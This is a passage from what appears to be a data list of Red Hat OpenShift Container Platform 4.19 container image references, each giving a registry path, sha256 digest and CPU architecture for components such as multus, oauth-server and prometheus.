"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
